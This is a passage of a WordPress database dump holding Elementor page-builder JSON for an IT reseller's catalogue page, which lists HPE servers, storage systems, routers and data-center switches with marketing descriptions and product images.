ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8614,3657,'_wp_page_template','template-portfolios.php'),(8615,3657,'_elementor_controls_usage','a:0:{}'),(8444,3639,'_wp_page_template','template-fullwidth.php'),(8445,3639,'_elementor_edit_mode','builder'),(8446,3639,'_elementor_template_type','post'),(8447,3639,'_elementor_version','2.5.14');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (8448,3639,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23469e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7ff144f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"b99977c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical 